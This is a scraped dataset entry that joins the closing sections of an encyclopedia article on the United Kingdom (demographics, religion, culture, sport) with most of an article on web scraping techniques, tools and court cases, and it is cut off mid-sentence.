update , 31.4 per cent of primary and 27.9 per cent of secondary pupils at state schools in England were members of an ethnic minority. 385 The English language is the official and most spoken language of the United Kingdom. 386 387 The United Kingdom proactively promotes the language globally to build connections, understanding and trust between people in the UK and countries worldwide. 388 389 It is estimated that 95 per cent of the UK's population are monolingual English speakers. 390 5.5 per cent of the population are estimated to speak languages brought to the UK as a result of relatively recent immigration. 390 South Asian languages are the largest grouping which includes Punjabi, Urdu, Bengali, Sylheti, Hindi, Pahari-Pothwari, Tamil, and Gujarati. 391 According to the 2011 census, Polish has become the second-largest language spoken in England and has 546,000 speakers. 392 In 2019, some three-quarters of a million people spoke little or no English. 393 Three indigenous Celtic languages are spoken in the UK: Welsh, Irish and Scottish Gaelic. Cornish, which became extinct as a first language in the late 18th century, is subject to revival efforts and has a small group of second language speakers. 394 2 According to the 2021 census, the Welsh-speaking population of Wales aged three or older was 538,300 people (17.8 per cent). 395 In addition, it is estimated that about 200,000 Welsh speakers live in England. 396 In the 2021 census in Northern Ireland 12.4% of people had some ability in the Irish language and 10.4% of people had some ability in the Ulster-Scots language. 397 Over 92,000 people in Scotland (just under 2 per cent of the population) had some Gaelic language ability, including 72 per cent of those living in the Outer Hebrides. 398 The number of children being taught either Welsh or Scottish Gaelic is increasing. 399 Scots, a language descended from early northern Middle English, has limited recognition alongside its regional variant, Ulster Scots in Northern Ireland, without specific commitments to protection and promotion. 2 400 As of April 2020, there are said to be around 151,000 users of British Sign Language (BSL), a sign language used by deaf people, in the UK. 401 Religion in the United Kingdom (2022 Census) 402 Forms of Christianity have dominated religious life in what is now the United Kingdom for more than 1,400 years. 403 Although a majority of citizens still identify with Christianity in many surveys, regular church attendance has fallen dramatically since the middle of the 20th century, 404 while immigration and demographic change have contributed to the growth of other faiths, most notably Islam. 405 This has led some commentators to variously describe the UK as a multi-faith, 406 secularised, 407 or post-Christian society. 408 In the 2001 census, 71.6 per cent of all respondents indicated that they were Christians, with the next largest faiths being Islam (2.8 per cent), Hinduism (1.0 per cent), Sikhism (0.6 per cent), Judaism (0.5 per cent), Buddhism (0.3 per cent) and all other religions (0.3 per cent). 409 Of the respondents, 15 per cent stated that they had no religion and a further 7 per cent did not state a religious preference. 410 A Tearfund survey in 2007 showed that only one in ten Britons actually attend church weekly. 411 Between the 2001 and 2011 census, there was a 12 per cent decrease in the number of people who identified as Christian, while the percentage of those reporting no religious affiliation doubled. This contrasted with growth in the other main religious group categories, with the number of Muslims increasing by the most substantial margin to a total of about 5 per cent. 412 The Muslim population has increased from 1.6 million in 2001 to 2.7 million in 2011, making it the second-largest religious group in the UK. 413 The Church of England is the established church in England. 414 It retains a representation in the UK Parliament, and the British monarch is its Supreme Governor. 415 In Scotland, the Church of Scotland is recognised as the national church. It is not subject to state control, and the British monarch is an ordinary member, required to swear an oath to "maintain and preserve the Protestant Religion and Presbyterian Church Government" upon his or her accession. 416 2 417 The Church in Wales was disestablished in 1920 and, because the Church of Ireland was disestablished in 1870 before the partition of Ireland, there is no established church in Northern Ireland. 418 Although there are no UK-wide data in the 2001 census on adherence to individual Christian denominations, it has been estimated that 62 per cent of Christians are Anglican, 13.5 per cent Catholic, 6 per cent Presbyterian, and 3.4 per cent Methodist, with small numbers of other Protestant denominations such as Plymouth Brethren, and Orthodox churches. 419 Immigration is now when? contributing to a rising UK population, 420 421 with arrivals and UK-born children of migrants accounting for about half of the population increase between 1991 and 2001. According to official statistics released in 2015, 27 per cent of UK live births in 2014 were to mothers born outside the UK. 422 The ONS reported that net migration rose from 2009 to 2010 by 21 per cent to 239,000. 423 In 2013, approximately 208,000 foreign nationals were naturalised as British citizens, the highest number since 1962. This figure fell to around 125,800 in 2014. Between 2009 and 2013, the average number of British citizenships granted annually was 195,800. The most common previous nationalities of those naturalised in 2014 were Indian, Pakistani, Filipino, Nigerian, Bangladeshi, Nepali, Chinese, South African, Polish and Somali. 424 The total number of grants of settlement, which confer permanent residence in the UK but not citizenship, 425 was approximately 154,700 in 2013, higher than the previous two years. 424 Long-term net migration (the number of people immigrating minus the number emigrating) reached a record high of 764,000 in 2022, with immigration at 1.26 million and emigration at 493,000. 426 In 2023 net migration was 685,000; 10% of the total who came to the UK in that year were EU Nationals. 421 More EU Nationals left the UK than arrived. 421 Emigration was an important feature of British society in the 19th century. Between 1815 and 1930, around 11.4 million people emigrated from Britain and 7.3 million from Ireland. Estimates show that by the end of the 20th century, some 300 million people of British and Irish descent were permanently settled around the globe. 427 Today, at least 5.5 million UK-born people live abroad, 428 429 mainly in Australia, Spain, the United States and Canada. 428 430 Education in the United Kingdom is a devolved matter, with each country having a separate education system. About 38 per cent of the United Kingdom population has a university or college degree, which is the highest percentage in Europe, and among the highest percentages in the world. 431 The United Kingdom is home to many universities, including the University of Oxford and University of Cambridge which often achieve first place on global rankings. 432 433 University education has varied tuition fees between the different regions of the UK. England and Wales have a fixed maximum annual fee for all UK citizens, contingent on attaining a certain level of income. Only those who reach a certain salary threshold ( 21,000) pay this fee through general taxation. Northern Ireland and Scotland have a reduced maximum fee or no fee for citizens where it is their home region. Some NHS courses have bursaries which pay the fee and in 2017 it was stated that each doctor gets subsidised by 230,000 during their training. 434 435 In 2022, the Programme for International Student Assessment (PISA), coordinated by the OECD, ranked the overall knowledge and skills of British 15 year-olds as 14th in the world in reading, mathematics and science. The average British student scored 494, well above the OECD average of 478. 436 437 The modern system of universal publicly funded in the United Kingdom has its origins in the creation of the National Health Service (NHS) in 1949 which still exists to this day and is the primary healthcare provider in the United Kingdom. The widespread popularity of the NHS has led to it being described as a "national religion". 438 439 Healthcare in the United Kingdom is a devolved matter and each country has its own system of universal publicly funded healthcare, although private healthcare is also available. Public healthcare is provided to all UK permanent residents and is mostly free at the point of need, being paid for from general taxation. The World Health Organization, in 2000, ranked the provision of healthcare in the United Kingdom as fifteenth best in Europe and eighteenth in the world. 440 Since 1979, expenditure on healthcare has been increased significantly. 441 The 2018 OECD data, which incorporates in health a chunk of what in the UK is classified as social care, has the UK spending 3,121 per head. 442 In 2017 the UK spent 2,989 per person on healthcare, around the median for members of the Organisation for Economic Co-operation and Development. 443 Regulatory bodies are organised on a UK-wide basis such as the General Medical Council, the Nursing and Midwifery Council and non-governmental-based, such as the Royal Colleges. Political and operational responsibility for healthcare lies with four national executives; healthcare in England is the responsibility of the UK Government; healthcare in Northern Ireland is the responsibility of the Northern Ireland Executive; healthcare in Scotland is the responsibility of the Scottish Government; and healthcare in Wales is the responsibility of the Welsh Government. Each National Health Service has different policies and priorities, resulting in contrasts. 444 The culture of the United Kingdom is influenced by many factors including: the nation's island status; its history; and being a political union of four countries with each preserving elements of distinctive traditions, customs and symbolism. As a result of the British Empire, British influence can be observed in the language, culture and legal systems of many of its former colonies, in particular, the United States, Australia, Canada, New Zealand, and Ireland, a common culture known today as the Anglosphere. 445 446 The substantial cultural influence of the United Kingdom has led to it being described as a cultural superpower. 125 126 A global survey in 2023 ranked the UK 3rd in the 'Most Influential Countries' rankings (behind the US and China). 447 British literature includes literature associated with the United Kingdom, the Isle of Man and the Channel Islands. Most British literature is in English. In 2022, 669 million physical books were sold in the UK, this is the highest overall level ever recorded. 448 Britain is renowned for children's literature, writer's includes Daniel Defoe, Rudyard Kipling, Lewis Carroll and Beatrix Potter who also illustrated her own books. Other writers include A.A. Milne, Enid Blyton, J.R.R. Tolkien, Roald Dahl, Terry Pratchett and J.K. Rowling who wrote the best selling book series of all time. 449 The English playwright and poet William Shakespeare is widely regarded as the greatest dramatist of all time. 450 Other important English writers include Geoffrey Chaucer, known for The Canterbury Tales, the poet William Wordsworth and other romantic poets, also the novelists Charles Dickens, H. G. Wells, George Orwell and Ian Fleming. The 20th-century English crime writer Agatha Christie is the best-selling novelist of all time. 451 Twelve of the top 25 of 100 novels by British writers chosen by a BBC poll of global critics were written by women; these included works by George Eliot, Virginia Woolf, Charlotte and Emily Bront , Mary Shelley, Jane Austen, Doris Lessing and Zadie Smith. 452 Scotland's contributions include Arthur Conan Doyle (the creator of Sherlock Holmes), Sir Walter Scott, J. M. Barrie, Robert Louis Stevenson and the poet Robert Burns. More recently Hugh MacDiarmid and Neil M. Gunn contributed to the Scottish Renaissance, with grimmer works from Ian Rankin and Iain Banks. Scotland's capital, Edinburgh, was UNESCO's first worldwide City of Literature. 453 Welsh literature includes Britain's oldest known poem, Y Gododdin, which was composed most likely in the late 6th century. It was written in Cumbric or Old Welsh and contains the earliest known reference to King Arthur. 454 The Arthurian legend was further developed by Geoffrey of Monmouth. 455 Poet Dafydd ap Gwilym (fl. 1320 1370) is regarded as one of the greatest European poets of his age. 456 Daniel Owen is credited as the first Welsh-language novelist, publishing Rhys Lewis in 1885. The best-known of the Anglo-Welsh poets are Dylan Thomas and R. S. Thomas, the latter nominated for the Nobel Prize in Literature in 1996. Leading Welsh novelists of the twentieth century include Richard Llewellyn and Kate Roberts. 457 458 Northern Ireland's most popular writer is C.S. Lewis who was born in Belfast and wrote The Chronicles of Narnia. 459 Irish writers, living at a time when all of Ireland was part of the United Kingdom, include Oscar Wilde, 460 Bram Stoker 461 and George Bernard Shaw. 462 There have been many authors whose origins were from outside the United Kingdom but who moved to the UK, including Joseph Conrad, 463 T. S. Eliot, 464 Kazuo Ishiguro, 465 Sir Salman Rushdie 466 and Ezra Pound. 467 The United Kingdom is famous for the tradition of 'British Empiricism', a branch of the philosophy of knowledge that states that only knowledge verified by experience is valid, and 'Scottish Philosophy', sometimes referred to as the 'Scottish School of Common Sense'. 468 The most famous philosophers of British Empiricism are John Locke, George Berkeley x and David Hume; while Dugald Stewart, Thomas Reid and William Hamilton were major exponents of the Scottish "common sense" school. Two Britons are also notable for the ethical theory of utilitarianism, a moral philosophy first used by Jeremy Bentham and later by John Stuart Mill in his short work Utilitarianism. 469 Various styles of music have become popular in the UK, including the indigenous folk music of England, Wales, Scotland and Northern Ireland. Historically, there has been exceptional Renaissance music from the Tudor period, with masses, madrigals and lute music by Thomas Tallis, John Taverner, William Byrd, Orlando Gibbons and John Dowland. After the Stuart Restoration, an English tradition of dramatic masques, anthems and airs became established, led by Henry Purcell, followed by Thomas Arne and others. The German-born composer George Frideric Handel became a naturalised British citizen in 1727, when he composed the anthem Zadok the Priest for the coronation of George II; it became the traditional ceremonial music for anointing all future monarchs. Handel's many oratorios, such as his famous Messiah, were written in the English language. 470 In the second half of the 19th century, as Arthur Sullivan and his librettist W. S. Gilbert wrote their popular Savoy operas, Edward Elgar's wide range of music rivalled that of his contemporaries on the continent. Increasingly, however, composers became inspired by the English countryside and its folk music, notably Gustav Holst, Ralph Vaughan Williams, and Benjamin Britten, a pioneer of modern British opera. Among the many post-war composers, some of the most notable have made their own personal choice of musical identity: Peter Maxwell Davies (Orkney), Harrison Birtwistle (mythological), and John Tavener (religious). 471 Today, recent classical singers include: Alfie Boe, Bryn Terfel, Katherine Jenkins, Michael Ball, Roderick Williams, Russell Watson and Sarah Brightman, while Nicola Benedetti and Nigel Kennedy are renowned for their violin ability. 472 According to The New Grove Dictionary of Music and Musicians, the term "pop music" originated in Britain in the mid 1950s to describe rock and roll's fusion with the "new youth music". 473 The Oxford Dictionary of Music states that artists such as the Beatles and the Rolling Stones drove pop music to the forefront of popular music in the early 1960s. 474 Birmingham became known as the birthplace of heavy metal, with the band Black Sabbath starting there in the 1960s. 475 In the following years, Britain widely occupied a part in the development of rock music, with British acts pioneering hard rock; 476 raga rock; heavy metal; 477 space rock; glam rock; 478 Gothic rock, 479 psychedelic rock, 480 and punk rock. 481 British acts also developed neo soul and created dubstep. 482 The modern UK is known to produce some of the most prominent English-speaking rappers along with the United States, including Stormzy, Kano, Yxng Bane, Ramz, Little Simz and Skepta. 483 The Beatles have international sales of over 1 billion units and are the biggest-selling and most influential band in the history of popular music. 485 486 487 488 Other prominent British contributors to have influenced popular music over the last 50 years include the Rolling Stones, Pink Floyd, Queen, Led Zeppelin, the Bee Gees, and Elton John, all of whom have worldwide record sales of 200 million or more. 489 The Brit Awards are the BPI's annual music awards, and some of the British recipients of the Outstanding Contribution to Music award include the Who, David Bowie, Eric Clapton, Rod Stewart, the Police, and Fleetwood Mac (who are a British-American band). 490 More recent UK music acts that have had international success include George Michael, Oasis, Spice Girls, Radiohead, Coldplay, Arctic Monkeys, Robbie Williams, Amy Winehouse, Susan Boyle, Adele, Ed Sheeran, Lewis Capaldi, One Direction, Harry Styles and Dua Lipa. 491 A number of UK cities are known for their music. Acts from Liverpool have had 54 UK chart number 1 hit singles, more per capita than any other city worldwide. 492 Glasgow's contribution to music was recognised in 2008 when it was named a UNESCO City of Music. 493 Manchester played a role in the spread of dance music such as acid house, and from the mid 1990s, Britpop. London and Bristol are closely associated with the origins of electronic music sub-genres such as drum and bass and trip hop. 494 UK dance music traces its roots back to the Black British Sound System Culture and the New Age Traveller movement of the 60s and 70s, 495 it also has influences from New Wave and Synth-pop such as from bands New Order and Depeche Mode 496 and also has influences from the Chicago House and Detroit Techno scenes. In the late 80's, dance music exploded with Rave culture mainly Acid House tracks which were made mainstream with novelty records (such as Smart E's Sesame's Treet and the Prodigy's Charly) 497 and the Balearic sound brought back from the Ibiza club scene. This led on to genres such as UK Garage, Speed Garage, Drum and bass, Jungle, Trance and Dubstep. Influential UK dance acts past and present include 808 State, Orbital, the Prodigy, Underworld, Roni Size, Leftfield, Massive Attack, Groove Armada, Fatboy Slim, Faithless, Basement Jaxx, Chemical Brothers, Sub Focus, Chase Status, Disclosure, Calvin Harris and Fred Again. 498 Other influential UK DJs include Judge Jules, Pete Tong, Carl Cox, Paul Oakenfold, John Digweed and Sasha. 499 Major British artists include: the Romantics William Blake, John Constable, Samuel Palmer and J. M. W. Turner; the portrait painters Sir Joshua Reynolds and Lucian Freud; the landscape artists Thomas Gainsborough and L. S. Lowry; the pioneer of the Arts and Crafts Movement William Morris; the figurative painter Francis Bacon; the Pop artists Peter Blake, Richard Hamilton and David Hockney; the pioneers of Conceptual art movement Art Language; 500 the collaborative duo Gilbert and George; the abstract artist Howard Hodgkin; and the sculptors Antony Gormley, Anish Kapoor and Henry Moore. During the late 1980s and 1990s the Saatchi Gallery in London helped to bring to public attention a group of multi-genre artists who would become known as the "Young British Artists": Damien Hirst, Chris Ofili, Rachel Whiteread, Tracey Emin, Mark Wallinger, Steve McQueen, Sam Taylor-Wood and the Chapman Brothers are among the better-known members of this loosely affiliated movement. The Royal Academy in London is a key organisation for the promotion of the visual arts in the United Kingdom. Major schools of art in the UK include: the six-school University of the Arts London, which includes the Central Saint Martins College of Art and Design and Chelsea College of Art and Design; Goldsmiths, University of London; the Slade School of Fine Art (part of University College London); the Glasgow School of Art; the Royal College of Art; and The Ruskin School of Drawing and Fine Art (part of the University of Oxford). The Courtauld Institute of Art is a leading centre for the teaching of the history of art. Important art galleries in the United Kingdom include the National Gallery, National Portrait Gallery, Tate Britain and Tate Modern (the most-visited modern art gallery in the world, with around 4.7 million visitors per year). 501 The United Kingdom has had a considerable influence on the history of the cinema. The British directors Alfred Hitchcock, whose film Vertigo is considered by some critics as the best film of all time, 502 and David Lean who directed Lawrence of Arabia are among the most critically acclaimed directors of all time. 503 Recent popular directors include: Christopher Nolan, Sam Mendes, Steve McQueen, Richard Curtis, Danny Boyle, Tony Scott and Ridley Scott. 504 505 506 507 Many British actors have achieved international fame and critical success. Some of the most commercially successful films of all time have been produced in the United Kingdom, including two of the highest-grossing film franchises (Harry Potter and James Bond). 508 2019 was a particularly good year for British films which grossed around 10.3 billion globally which was 28.7% of global box office revenue. 509 UK box-office takings totalled 1.25 billion in 2019, with around 176 million admissions. 510 In 2023 UK film and television studio stage space stands at 6.9 million sq ft, with 1 million sq ft added in the past year with more in development. 511 The annual BAFTA Film Awards are hosted by the British Academy of Film and Television Arts. 512 British cuisine developed from various influences reflective of its land, settlements, arrivals of new settlers and immigrants, trade and colonialism. The food of England has historically been characterised by its simplicity of approach and a reliance on the high quality of natural produce. 513 The traditional Sunday roast is one example, featuring a roasted joint, usually of beef, lamb, chicken or pork, often free range (and generally grass-fed, in the case of beef). Roasts are served with either roasted or boiled vegetables, Yorkshire pudding, and gravy. Other traditional meals include meat pies and various stews. A 2019 YouGov poll rated classic British food, the following had more than 80% of people like them who had tried them: Sunday roast, Yorkshire pudding, Fish and chips, Crumpets, and Full English breakfast. 514 The UK is home to a large selection of fine-dining experiences, in 2024 there were 187 Restaurants with a Michelin Star, 49 of them consider their cuisine to be 'Modern British'. 515 Sweet foods are common within British cuisine, and there is a long list of British desserts. Afternoon tea is a light afternoon meal served with tea in tea rooms and hotels around the United Kingdom, with the tradition dating back to around 1840. 516 Vegan and vegetarian diets have increased in Britain in recent years. In 2021, a survey found that 8% of British respondents eat a plant-based diet and 36% of respondents have a favourable view of plant-based diets. 517 The British Empire facilitated a knowledge of Indian cuisine with its "strong, penetrating spices and herbs". British cuisine has absorbed the cultural influence of those who have settled in Britain, producing hybrid dishes, such as chicken tikka masala. 518 The British have embraced world cuisine and regularly eat recipes or fast food from Europe, the Caribbean and Asia. The BBC, founded in 1922, is the UK's publicly funded radio, television and Internet broadcasting corporation, and is the oldest and largest broadcaster in the world. 519 520 521 It operates numerous television and radio stations in the UK and abroad and its domestic services are funded by the television licence. 522 The BBC World Service is an international broadcaster owned and operated by the BBC. It is the world's largest of any kind. 523 It broadcasts radio news, speech and discussions in more than 40 languages. 524 Other major players in the UK media include ITV, which operates 11 of the 15 regional television broadcasters that make up the ITV Network, 525 and Sky. 526 Newspapers produced in the United Kingdom include the Daily Mail, The Guardian, The Telegraph, The Times, and the Financial Times. 527 Magazines and journals published in the United Kingdom that have achieved worldwide circulation include The Spectator, The Economist, New Statesman, and Radio Times. London dominates the media sector in the UK: national newspapers and television and radio are largely based there, although MediaCityUK in Manchester is also a significant national media centre. Edinburgh and Glasgow, and Cardiff, are important centres of newspaper and broadcasting production in Scotland and Wales, respectively. 528 The UK publishing sector, including books, directories and databases, journals, magazines and business media, newspapers and news agencies, has a combined turnover of around 20 billion and employs around 167,000 people. 529 In 2015, the UK published 2,710 book titles per million inhabitants, more than any other country, much of this being exported to other Anglophone countries. 530 In 2010, 82.5 per cent of the UK population were Internet users, the highest proportion among the 20 countries with the largest total number of users in that year. 531 The British video game industry is the largest in Europe, and, since 2022, the UK has the largest video game market in Europe by sales, overtaking Germany. 532 It is the world's third-largest producer of video games after Japan and the United States. 533 Association football, tennis, table tennis, badminton, rugby union, rugby league, rugby sevens, golf, boxing, netball, water polo, field hockey, billiards, darts, rowing, rounders and cricket originated or were substantially developed in the UK, with the rules and codes of many modern sports invented and codified in late 19th-century Victorian Britain. y A 2003 poll found that football is the most popular sport in the UK. 536 England is recognised by FIFA as the birthplace of club football, and the Football Association is the oldest of its kind, with the rules of football first drafted in 1863 by Ebenezer Cobb Morley. 537 Each of the Home Nations (England, Scotland, Wales and Northern Ireland) has its own football association, national team and league system, and each is individually a governing member of the International Football Association Board alongside FIFA. The English top division, the Premier League, is the most watched football league in the world. 538 The first international football match was contested by England and Scotland on 30 November 1872. 539 England, Scotland, Wales and Northern Ireland usually compete as separate countries in international competitions. 540 In 2003, rugby union was ranked the second most popular sport in the UK. 536 The sport was created in Rugby School, Warwickshire, and the first rugby international took place on 27 March 1871 between England and Scotland. 541 542 England, Scotland, Wales, Ireland, France and Italy compete in the Six Nations Championship, which is the premier international rugby union tournament in the northern hemisphere. Sports governing bodies in England, Scotland, Wales and Ireland organise and regulate the game separately. 543 Every four years, the Home Nations make a combined team known as the British and Irish Lions which tours Australia, New Zealand and South Africa. The United Kingdom hosted the Summer Olympic Games in 1908, 1948 and 2012, with London acting as the host city on all three occasions. Birmingham hosted the 2022 Commonwealth Games, the seventh time a constitute country in the United Kingdom hosted the Commonwealth Games (England, Scotland and Wales have each hosted the Commonwealth Games at least once). 544 The flag of the United Kingdom is the Union Flag (also referred to as the Union Jack). 545 It was created in 1606 by the superimposition of the flag of England, representing Saint George, on the flag of Scotland, representing Saint Andrew, and was updated in 1801 with the addition of Saint Patrick's Flag. 546 Wales is not represented in the Union Flag, as Wales had been conquered and annexed to England prior to the formation of the United Kingdom. The possibility of redesigning the Union Flag to include representation of Wales has not been completely ruled out. 547 The national anthem of the United Kingdom is "God Save the King", with "King" replaced with "Queen" in the lyrics whenever the monarch is a woman. Britannia is a national personification of the United Kingdom, originating from Roman Britain. 548 Beside The Lion and the Unicorn and the dragon of heraldry, the bulldog is an iconic animal and commonly represented with the Union Flag. 549 A now rare personification is a character originating in the 18th century, John Bull. 550 England, Wales, and Scotland each have a number of their own national symbols, including their national flags. Northern Ireland also has a number of symbols, many of which are shared with Republic of Ireland. 55 N 3 W 55 N 3 W 55; 3 |
108 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-31 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power 